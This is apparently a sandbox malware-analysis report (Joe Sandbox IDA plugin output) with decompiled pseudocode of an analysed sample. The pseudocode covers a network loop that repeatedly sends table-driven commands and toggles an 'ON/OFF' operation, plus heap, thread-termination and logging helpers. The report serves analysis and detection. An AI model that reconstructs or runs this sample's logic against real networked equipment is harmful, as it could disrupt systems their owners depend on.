												 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))), 1,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 9) & 0x000000ff);
											}
											_t503 =  *(_t661 + 8);
											__eflags = ( *(_t503 + 0x10018) & 0x000000ff) - 1;
											if(( *(_t503 + 0x10018) & 0x000000ff) != 1) {
												_t503 =  *(_t661 - 4);
												 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 9) & 0x000000ff);
												_t644 =  *(_t661 + 8);
												__eflags = ( *(_t644 + 0x10018) & 0x000000ff) - 1;
												if(( *(_t644 + 0x10018) & 0x000000ff) != 1) {
													_t556 =  *(_t661 - 8) & 0x00000040;
													__eflags =  *(_t661 - 8) & 0x00000040;
													if(( *(_t661 - 8) & 0x00000040) == 0) {
														E00A439C0(E00A436C0(_t556));
														_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))));
														_push(0x68b1);
														__eflags =  *(_t661 + 8) + 0x1001d;
														E00A43830(__eflags, E00A436C0( *(_t661 + 8) + 0x1001d), " %s M%X %d\n",  *(_t661 + 8) + 0x1001d);
														_t663 = _t663 + 0x14;
													}
													L27:
													_t503 =  *(_t661 - 0xc) + 1;
													__eflags = _t503;
													 *(_t661 - 0xc) = _t503;
													continue;
												}
											} else {
											}
											break;
										}
										goto L27;
									}
									_t611 =  *(_t661 + 8);
									__eflags =  *(_t611 + 0x10046) & 0x000000ff;
									if(( *(_t611 + 0x10046) & 0x000000ff) == 0) {
										L61:
										goto L74;
									}
									Sleep(0x3e8);
									 *(_t661 - 0x20) = 0xffffffff;
									_t525 =  *(_t661 + 8);
									__eflags =  *(_t525 + 0x10045) & 0x000000ff;
									if(( *(_t525 + 0x10045) & 0x000000ff) != 0) {
										 *(_t661 - 0x30) = 0;
									} else {
										 *(_t661 - 0x30) = 1;
									}
									 *((char*)( *(_t661 + 8) + 0x10045)) =  *(_t661 - 0x30);
									E00A439C0(E00A436C0( *(_t661 - 0x30)));
									_push(0x68b3);
									E00A43830(__eflags, E00A436C0(_t422), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
									_t666 = _t663 + 0x10;
									_t426 =  *(_t661 + 8);
									_t528 =  *(_t426 + 0x10045) & 0x000000ff;
									__eflags =  *(_t426 + 0x10045) & 0x000000ff;
									if(( *(_t426 + 0x10045) & 0x000000ff) == 0) {
										 *(_t661 - 0x34) = "OFF\n\n";
									} else {
										 *(_t661 - 0x34) = "ON\n\n";
									}
									E00A43830(__eflags, E00A436C0(_t528), "\nCurrent operation : %s",  *(_t661 - 0x34));
									_t663 = _t666 + 0xc;
									 *(_t661 - 0x10) = 0;
									while(1) {
										_t503 =  *(_t661 + 8);
										__eflags =  *(_t661 - 0x10) -  *((intOrPtr*)(_t503 + 0x1014c));
										if( *(_t661 - 0x10) >=  *((intOrPtr*)(_t503 + 0x1014c))) {
											goto L61;
										}
										_t430 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4));
										__eflags =  *((intOrPtr*)(_t430 + 0xc)) -  *(_t661 - 0x14);
										if( *((intOrPtr*)(_t430 + 0xc)) ==  *(_t661 - 0x14)) {
											_t619 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4));
											__eflags =  *(_t619 + 8) & 0x000000ff;
											if(( *(_t619 + 8) & 0x000000ff) != 0) {
												 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))), 1,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 9) & 0x000000ff);
											}
											_t433 =  *(_t661 + 8);
											_t503 =  *(_t433 + 0x10018) & 0x000000ff;
											__eflags = ( *(_t433 + 0x10018) & 0x000000ff) - 1;
											if(( *(_t433 + 0x10018) & 0x000000ff) != 1) {
												 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 9) & 0x000000ff);
												_t503 =  *(_t661 + 8);
												__eflags = ( *(_t503 + 0x10018) & 0x000000ff) - 1;
												if(( *(_t503 + 0x10018) & 0x000000ff) != 1) {
													__eflags =  *(_t661 - 8) & 0x00000040;
													if(( *(_t661 - 8) & 0x00000040) == 0) {
														E00A439C0(E00A436C0(_t503));
														_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))));
														_push(0x68b1);
														__eflags =  *(_t661 + 8) + 0x1001d;
														E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4))), " %s M%X %d\n",  *(_t661 + 8) + 0x1001d);
														_t663 = _t663 + 0x14;
													}
													L48:
													_t444 =  *(_t661 - 0x10) + 1;
													__eflags = _t444;
													 *(_t661 - 0x10) = _t444;
													continue;
												}
											} else {
											}
											goto L61;
										}
										goto L48;
									}
									goto L61;
								}
								_t654 =  *(_t661 - 0x14) + 1;
								__eflags = _t654;
								 *(_t661 - 0x14) = _t654;
							}
							_t352 =  *(_t661 + 8);
							__eflags =  *(_t352 + 0x10046) & 0x000000ff;
							if(( *(_t352 + 0x10046) & 0x000000ff) != 0) {
								_t581 =  *(_t661 + 8);
								__eflags =  *(_t661 - 0x20) -  *((intOrPtr*)(_t581 + 0x10d58));
								if( *(_t661 - 0x20) >=  *((intOrPtr*)(_t581 + 0x10d58))) {
									 *(_t661 - 0x20) = 0xffffffff;
									_t499 =  *(_t661 + 8);
									__eflags =  *(_t499 + 0x10045) & 0x000000ff;
									if(( *(_t499 + 0x10045) & 0x000000ff) != 0) {
										 *(_t661 - 0x38) = 0;
									} else {
										 *(_t661 - 0x38) = 1;
									}
									 *((char*)( *(_t661 + 8) + 0x10045)) =  *(_t661 - 0x38);
									E00A439C0(E00A436C0( *(_t661 - 0x38)));
									_push(0x68b3);
									E00A43830(__eflags, E00A436C0(_t375), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
									_t665 = _t663 + 0x10;
									_t379 =  *(_t661 + 8);
									_t502 =  *(_t379 + 0x10045) & 0x000000ff;
									__eflags =  *(_t379 + 0x10045) & 0x000000ff;
									if(( *(_t379 + 0x10045) & 0x000000ff) == 0) {
										 *(_t661 - 0x3c) = "OFF\n\n";
									} else {
										 *(_t661 - 0x3c) = "ON\n\n";
									}
									E00A43830(__eflags, E00A436C0(_t502), "\nCurrent operation : %s",  *(_t661 - 0x3c));
									_t663 = _t665 + 0xc;
								}
							}
							Sleep(0x3e8);
							L92:
							 *(_t661 - 8) = E00A46220( *(_t661 - 4),  *(_t661 + 8));
							 *( *(_t661 + 8) + 0x10018) = 1;
							_t355 =  *(_t661 + 8);
							__eflags = ( *(_t355 + 0x10018) & 0x000000ff) - 1;
							if(( *(_t355 + 0x10018) & 0x000000ff) != 1) {
							}
							goto L1;
						}
						 *((intOrPtr*)( *(_t661 + 8) + 0x10038)) = E00A46310( *(_t661 - 4),  *(_t661 + 8));
						_t656 =  *(_t661 + 8);
						__eflags =  *((intOrPtr*)(_t656 + 0x10038)) - 0xffffffff;
						if( *((intOrPtr*)(_t656 + 0x10038)) != 0xffffffff) {
							_push( *((intOrPtr*)( *(_t661 + 8) + 0x10038)));
							_push(0x68b4);
							E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *(_t661 + 8) + 0x10038))), " %s ST%X %d\n",  *(_t661 + 8) + 0x1001d);
							_t663 = _t663 + 0x14;
						}
						goto L92;
					} else {
						if( *( *(_t661 + 8) + 0xc) != 0) {
							asm("cdq");
							if( *(_t661 - 0x28) %  *( *(_t661 + 8) + 0xc) == 0) {
								Sleep( *( *(_t661 + 8) + 0x10040) * 0x3e8);
							}
						}
						L1:
						 *((intOrPtr*)(_t661 - 0x44)) =  *((intOrPtr*)(_t661 - 0x24));
						 *((intOrPtr*)(_t661 - 0x48)) =  *((intOrPtr*)(_t661 - 0x40));
						 *((intOrPtr*)(_t661 - 0x24)) =  *((intOrPtr*)(_t661 - 0x24)) + 1;
						if( *((intOrPtr*)(_t661 - 0x44)) >=  *((intOrPtr*)(_t661 - 0x48))) {
							L95:
							__imp__#116(); // executed
							return 0;
						}
					}
					 *(_t661 - 0x28) =  *(_t661 - 0x28) + 1;
				} while (( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1);
				_t370 = E00A45650( *(_t661 + 8) + 0x1001d,  *((intOrPtr*)( *(_t661 + 8) + 0x10034))); // executed
				 *(_t661 - 4) = _t370;
				if( *(_t661 - 4) != 0xffffffff) {
					 *( *(_t661 + 8) + 0x10018) = 0;
					 *((char*)( *(_t661 + 8) + 0x1001b)) = 1;
					L6:
					 *( *(_t661 + 8) + 4) = 0;
					 *( *(_t661 + 8) + 8) = 0;
					 *(_t661 - 8) = E00A46140( *(_t661 - 4),  *(_t661 + 8));
					 *(_t661 - 8) = E00A45F10( *(_t661 - 4),  *(_t661 + 8));
					goto L7;
				} else {
					 *( *(_t661 + 8) + 0x10018) = 1;
					 *((char*)( *(_t661 + 8) + 0x1001b)) = 0;
					goto L95;
				}
			}

0x00a46b8d
0x00a46bd7
0x00a46bd7
0x00a46be4
0x00a46c16
0x00a46c19
0x00a46c20
0x00a46c8e
0x00a46c9f
0x00a46ca4
0x00a46cab
0x00a46caf
0x00a46cbc
0x00a46cb1
0x00a46cb7
0x00a46cb7
0x00a46cc6
0x00a46cd4
0x00a46cd4
0x00a46cda
0x00a46ce0
0x00000000
0x00000000
0x00a46ce9
0x00a46cef
0x00a46cf2
0x00a46cf9
0x00a46cfb
0x00a46d02
0x00a46d0c
0x00a46d0e
0x00a47095
0x00a470a7
0x00a470a7
0x00a470ad
0x00a470b3
0x00000000
0x00000000
0x00a470c5
0x00a470cb
0x00a470ce
0x00a470de
0x00a47137
0x00a4713a
0x00a4713e
0x00a47146
0x00a4714c
0x00a47161
0x00a47166
0x00a47179
0x00a47179
0x00a47194
0x00a47199
0x00a471a2
0x00a471ab
0x00a471ab
0x00a471b1
0x00a471b1
0x00a471b9
0x00a471b9
0x00a470a1
0x00a470a1
0x00a470a4
0x00a470a4
0x00a471c4
0x00a471c8
0x00a471dd
0x00a471e2
0x00a471ee
0x00a471f5
0x00a471f5
0x00a471fa
0x00a471fa
0x00a471fe
0x00a4725e
0x00a4725e
0x00a47262
0x00a47264
0x00a47267
0x00a4726e
0x00a47277
0x00a4727c
0x00a47295
0x00a4729a
0x00a472a0
0x00a472a0
0x00a472ab
0x00a472ab
0x00a4726e
0x00a472b1
0x00000000
0x00a472b1
0x00a47200
0x00a47203
0x00a4720a
0x00000000
0x00000000
0x00a4720c
0x00a4720f
0x00a47212
0x00a47218
0x00000000
0x00000000
0x00a47221
0x00a47226
0x00a47240
0x00a47245
0x00a47256
0x00000000
0x00a47256
0x00a46d14
0x00a46d26
0x00a46d26
0x00a46d2c
0x00a46d32
0x00000000
0x00000000
0x00a46d44
0x00a46d4a
0x00a46d4d
0x00a46d5d
0x00a46d64
0x00a46d66
0x00a46db5
0x00a46db5
0x00a46db8
0x00a46dc2
0x00a46dc5
0x00a46e10
0x00a46e19
0x00a46e1c
0x00a46e26
0x00a46e29
0x00a46e30
0x00a46e30
0x00a46e33
0x00a46e3c
0x00a46e52
0x00a46e53
0x00a46e5b
0x00a46e6d
0x00a46e72
0x00a46e72
0x00a46d1d
0x00a46d20
0x00a46d20
0x00a46d23
0x00000000
0x00a46d23
0x00000000
0x00a46dc7
0x00000000
0x00a46dc5
0x00000000
0x00a46d4f
0x00a46e7a
0x00a46e84
0x00a46e86
0x00a47090
0x00000000
0x00a47090
0x00a46e91
0x00a46e97
0x00a46e9e
0x00a46ea8
0x00a46eaa
0x00a46eb5
0x00a46eac
0x00a46eac
0x00a46eac
0x00a46ec2
0x00a46ecf
0x00a46ed4
0x00a46eee
0x00a46ef3
0x00a46ef6
0x00a46ef9
0x00a46f00
0x00a46f02
0x00a46f0d
0x00a46f04
0x00a46f04
0x00a46f04
0x00a46f23
0x00a46f28
0x00a46f2b
0x00a46f3d
0x00a46f3d
0x00a46f43
0x00a46f49
0x00000000
0x00000000
0x00a46f5b
0x00a46f61
0x00a46f64
0x00a46f74
0x00a46f7b
0x00a46f7d
0x00a46fcc
0x00a46fcc
0x00a46fcf
0x00a46fd2
0x00a46fd9
0x00a46fdc
0x00a47030
0x00a47033
0x00a4703d
0x00a47040
0x00a47047
0x00a4704a
0x00a47053
0x00a47069
0x00a4706a
0x00a47072
0x00a47083
0x00a47088
0x00a47088
0x00a46f34
0x00a46f37
0x00a46f37
0x00a46f3a
0x00000000
0x00a46f3a
0x00000000
0x00a46fde
0x00000000
0x00a46fdc
0x00000000
0x00a46f66
0x00000000
0x00a46f3d
0x00a46cce
0x00a46cce
0x00a46cd1
0x00a46cd1
0x00a472b8
0x00a472c2
0x00a472c4
0x00a472ca
0x00a472d0
0x00a472d6
0x00a472dc
0x00a472e3
0x00a472ed
0x00a472ef
0x00a472fa
0x00a472f1
0x00a472f1
0x00a472f1
0x00a47307
0x00a47314
0x00a47319
0x00a47333
0x00a47338
0x00a4733b
0x00a4733e
0x00a47345
0x00a47347
0x00a47352
0x00a47349
0x00a47349
0x00a47349
0x00a47368
0x00a4736d
0x00a4736d
0x00a472d6
0x00a47375
0x00a4737b
0x00a47388
0x00a4738e
0x00a47395
0x00a4739f
0x00a473a2
0x00a473a2
0x00000000
0x00a473a2
0x00a46c32
0x00a46c38
0x00a46c3b
0x00a46c42
0x00a46c57
0x00a46c58
0x00a46c72
0x00a46c77
0x00a46c77
0x00000000
0x00a46be6
0x00a46bed
0x00a46bf5
0x00a46bfb
0x00a46c0b
0x00a46c0b
0x00a46bfb
0x00a46b15
0x00a46b18
0x00a46b1e
0x00a46b27
0x00a46b30
0x00a473ae
0x00a473ae
0x00a473b9
0x00a473b9
0x00a46b30
0x00a46b3c
0x00a46b49
0x00a46b66
0x00a46b6b
0x00a46b72
0x00a46b92
0x00a46b9c
0x00a46ba3
0x00a46ba6
0x00a46bb0
0x00a46bc4
0x00a46bd4
0x00000000
0x00a46b74
0x00a46b77
0x00a46b81
0x00000000
0x00a46b81

APIs

Part of subcall function 00A46140: Sleep.KERNEL32(000003E8,00000000,00000000,?), ref: 00A461B5

Part of subcall function 00A45F10: Sleep.KERNEL32(000003E8,00000000,00000000,?), ref: 00A45F91

Sleep.KERNEL32(?,?,00000000,00000000,00000000,00000000,-0001001D,?,?,00000000), ref: 00A46C0B
WSACleanup.WS2_32 ref: 00A473AE

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Sleep$Cleanup
String ID:
API String ID: 2502407352-0
Opcode ID: 8669e9d915e2fa3851abdf4cad69cc6301fa7b46464185caa1b0d8da2467090e
Instruction ID: 995a2a33d67cd6c4f78bd12d256be523b6ca48c0a8dc844f20e2b6dec320ad3d
Opcode Fuzzy Hash: 8669e9d915e2fa3851abdf4cad69cc6301fa7b46464185caa1b0d8da2467090e
Instruction Fuzzy Hash: BF310978A00208DFCB14CFA4C584ADDBBB6FF89314F248199E8489F241C775AE82DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A43360 Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A43360(short* _a4) {
				char* _v8;
				int _v12;
				char* _t17;

				_v8 = 0;
				_v12 = WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				if(_v12 != 0) {
					_t17 = E00A42420(_v12, _v12); // executed
					_v8 = _t17;
					if(_v8 != 0) {
						_t22 = _a4;
						if(WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff, _v8, _v12, 0, 0) == 0) {
							E00A424F0(_t22, _v8);
							_v8 = 0;
						}
					}
				}
				return _v8;
			}

0x00a43366
0x00a43388
0x00a4338f
0x00a43395
0x00a4339a
0x00a433a1
0x00a433b1
0x00a433c4
0x00a433ca
0x00a433cf
0x00a433cf
0x00a433c4
0x00a433a1
0x00a433dc

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00A432B3,000000FF,00000000,00000000,00000000,00000000,00A432B3), ref: 00A43382

Part of subcall function 00A42420: GetProcessHeap.KERNEL32(00000008,00000000,?,?,00A4262C,00000000,?,00A450E3,000001AC,00000000,?,00A49C88,00000000,00000000,00A49C80), ref: 00A4242A
Part of subcall function 00A42420: RtlAllocateHeap.NTDLL(00000000,?,?,00A4262C,00000000,?,00A450E3,000001AC,00000000,?,00A49C88,00000000,00000000,00A49C80), ref: 00A42431

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 00A433BC

Part of subcall function 00A424F0: GetProcessHeap.KERNEL32(00000000,00000000,00000001,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42500
Part of subcall function 00A424F0: HeapSize.KERNEL32(00000000,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42507
Part of subcall function 00A424F0: GetProcessHeap.KERNEL32(00000000,00000000,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42529
Part of subcall function 00A424F0: HeapFree.KERNEL32(00000000,?,00A4263C,00A45167,?,00A451B5,00000001,000001AC,00000000), ref: 00A42530

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Heap$Process$ByteCharMultiWide$AllocateFreeSize
String ID:
API String ID: 2862435150-0
Opcode ID: 3f240fa7267f9a1e5c98d22f78a790284241ae7be23b5c882141117694c1cdc3
Instruction ID: 06f9967acea6fa7a154746e57b8982b9659680bd4fae6529edce254df19dc33d
Opcode Fuzzy Hash: 3f240fa7267f9a1e5c98d22f78a790284241ae7be23b5c882141117694c1cdc3
Instruction Fuzzy Hash: 8101E179A40208FBEB20EFA4CD46F9EB7B5AB84710F204254B6106F2C0D6B0AA40D754

Uniqueness

Uniqueness Score: -1.00%

Function 00A42970 Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A42970(intOrPtr __ecx, void* _a4) {
				long _v8;
				intOrPtr _v12;
				int _t9;

				_v12 = __ecx;
				_t9 = E00A427D0(__ecx, _a4);
				if((_t9 & 0x000000ff) != 0) {
					_v8 = 0;
					_t9 = GetExitCodeThread(_a4,  &_v8); // executed
					if(_t9 == 0 || _v8 == 0x103) {
						return TerminateThread(_a4, 1);
					}
				}
				return _t9;
			}

0x00a42976
0x00a4297d
0x00a42987
0x00a42989
0x00a42998
0x00a429a0
0x00000000
0x00a429b1
0x00a429a0
0x00a429ba

APIs

GetExitCodeThread.KERNELBASE(?,00000000,?,?), ref: 00A42998
TerminateThread.KERNEL32(00000001,00000001), ref: 00A429B1

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Thread$CodeExitTerminate
String ID:
API String ID: 101341946-0
Opcode ID: 3f4a740617ac5f8bafd1906a728c0f4969a3816109ef94f5180039bd60830514
Instruction ID: c3c84aab693d4996e9d30b553a619254dbb3757935ec80ffb51f78496a43d8ee
Opcode Fuzzy Hash: 3f4a740617ac5f8bafd1906a728c0f4969a3816109ef94f5180039bd60830514
Instruction Fuzzy Hash: 7BF0307D901208A7CF14DFA5D844BEE7B78AF94301F408558F9449B241D775DA54C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A436C0 Relevance: 3.0, APIs: 2, Instructions: 23
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A436C0(void* __ecx) {
				intOrPtr _v8;

				if(InterlockedCompareExchange(0xa4b060, 1, 0) != 0) {
					Sleep(0xa); // executed
				} else {
					_v8 = E00A43650(1, 0xa4b064);
					E00A437E0(_v8);
				}
				return 0xa4b064;
			}

0x00a436d5
0x00a436f5
0x00a436d7
0x00a436e6
0x00a436ec
0x00a436ec
0x00a43703

APIs

InterlockedCompareExchange.KERNEL32(00A4B060,00000001,00000000), ref: 00A436CD
Sleep.KERNELBASE(0000000A,?,00A44FC5, T%d %h,00000000,00006810,00000000,00000000,?,?,?,00000000,00000000), ref: 00A436F5

Part of subcall function 00A437E0: InitializeCriticalSection.KERNEL32(00A4B040,?,?,00A436F1,00000000,?,?,?,00000000,00000000), ref: 00A437EC

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CompareCriticalExchangeInitializeInterlockedSectionSleep
String ID:
API String ID: 4144454223-0
Opcode ID: cfb5f4acae31bc26b482fef53de636fcac2b9ab0ca571381f3b78b0f238a45a2
Instruction ID: 65b597c462cc3d5c206c7ff7d84ca7a547aeede397280ce795e48d1157284808
Opcode Fuzzy Hash: cfb5f4acae31bc26b482fef53de636fcac2b9ab0ca571381f3b78b0f238a45a2
Instruction Fuzzy Hash: A1E0867D794309B7DB10DBA4AD07B5F7628ABC1B02F100574F909662D1EBD29A108262

Uniqueness

Uniqueness Score: -1.00%

Function 00A46C7F Relevance: 1.6, APIs: 1, Instructions: 51
networkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00A46C7F() {
				signed int _t354;
				signed int _t355;
				signed int _t362;
				void* _t366;
				signed int _t375;
				signed int _t409;
				intOrPtr _t413;
				signed int _t416;
				long _t427;
				intOrPtr _t443;
				signed int _t472;
				signed int _t473;
				long _t475;
				signed int _t477;
				signed int _t489;
				signed int _t490;
				signed int _t495;
				intOrPtr _t506;
				long _t519;
				signed int _t521;
				intOrPtr _t543;
				signed int _t565;
				signed int _t576;
				void* _t583;
				signed int _t584;
				signed int _t585;
				long _t586;
				signed int _t587;
				signed int _t605;
				signed int _t606;
				intOrPtr _t614;
				signed int _t639;
				long _t649;
				signed int _t651;
				void* _t661;
				void* _t663;
				void* _t665;
				void* _t666;

				while(1) {
					L92:
					 *(_t661 - 8) = E00A46220( *(_t661 - 4),  *(_t661 + 8));
					 *( *(_t661 + 8) + 0x10018) = 1;
					if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
					}
					while(1) {
						L1:
						 *((intOrPtr*)(_t661 - 0x44)) =  *((intOrPtr*)(_t661 - 0x24));
						 *((intOrPtr*)(_t661 - 0x48)) =  *((intOrPtr*)(_t661 - 0x40));
						 *((intOrPtr*)(_t661 - 0x24)) =  *((intOrPtr*)(_t661 - 0x24)) + 1;
						if( *((intOrPtr*)(_t661 - 0x44)) >=  *((intOrPtr*)(_t661 - 0x48))) {
							break;
						}
						 *(_t661 - 0x28) =  *(_t661 - 0x28) + 1;
						if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
							L7:
							_t489 =  *(_t661 + 8);
							__eflags = ( *(_t489 + 0x10018) & 0x000000ff) - 1;
							if(( *(_t489 + 0x10018) & 0x000000ff) != 1) {
								_t490 =  *(_t661 + 8);
								__eflags =  *((intOrPtr*)(_t490 + 0x10038)) - 0xffffffff;
								if( *((intOrPtr*)(_t490 + 0x10038)) != 0xffffffff) {
									E00A46480( *(_t661 - 4),  *(_t661 + 8));
									E00A42540(_t661 - 0xc8, 0x80);
									 *(_t661 - 0x18) = 0;
									__eflags =  *(_t661 - 0x20) - 0xffffffff;
									if( *(_t661 - 0x20) <= 0xffffffff) {
										 *(_t661 - 0x2c) = 0;
									} else {
										 *(_t661 - 0x2c) =  *(_t661 - 0x20) + 1;
									}
									 *(_t661 - 0x14) =  *(_t661 - 0x2c);
									while(1) {
										_t354 =  *(_t661 + 8);
										__eflags =  *(_t661 - 0x14) -  *((intOrPtr*)(_t354 + 0x10d58));
										if( *(_t661 - 0x14) >  *((intOrPtr*)(_t354 + 0x10d58))) {
											break;
										}
										 *(_t661 - 0x20) =  *(_t661 - 0x14);
										_t366 =  *(_t661 + 8) +  *(_t661 - 0x14);
										_t499 =  *((char*)(_t366 + 0x10956));
										__eflags =  *((char*)(_t366 + 0x10956));
										if( *((char*)(_t366 + 0x10956)) != 0) {
											_t583 =  *(_t661 + 8) +  *(_t661 - 0x14);
											__eflags =  *((char*)(_t583 + 0x10556));
											if( *((char*)(_t583 + 0x10556)) != 0) {
												 *(_t661 - 0x1c) = 0;
												while(1) {
													_t584 =  *(_t661 + 8);
													__eflags =  *(_t661 - 0x1c) -  *((intOrPtr*)(_t584 + 0x1014c));
													if( *(_t661 - 0x1c) >=  *((intOrPtr*)(_t584 + 0x1014c))) {
														break;
													}
													_t506 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4));
													__eflags =  *((intOrPtr*)(_t506 + 0xc)) -  *(_t661 - 0x14);
													if( *((intOrPtr*)(_t506 + 0xc)) ==  *(_t661 - 0x14)) {
														E00A42540(_t661 - 0x1c8, 0x100);
														 *(_t661 - 8) = E00A46860( *(_t661 - 4), _t661 - 0x1c8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)) + 9) & 0x000000ff);
														__eflags =  *(_t661 - 8);
														if( *(_t661 - 8) > 0) {
															__eflags =  *(_t661 - 0x18) +  *(_t661 - 8) - 0x80;
															if( *(_t661 - 0x18) +  *(_t661 - 8) >= 0x80) {
																E00A457D0(_t661 - 0xc8,  *(_t661 - 4), _t661 - 0xc8,  *(_t661 - 0x18),  *(_t661 + 8));
																 *(_t661 - 0x18) = 0;
																E00A42540(_t661 - 0xc8, 0x80);
															}
															E00A42190(_t661 +  *(_t661 - 0x18) - 0xc8, _t661 - 0x1c8,  *(_t661 - 8));
															_t663 = _t663 + 0xc;
															 *(_t661 - 0x18) =  *(_t661 - 0x18) +  *(_t661 - 8);
															_t519 =  *( *(_t661 + 8) + 8) + 1;
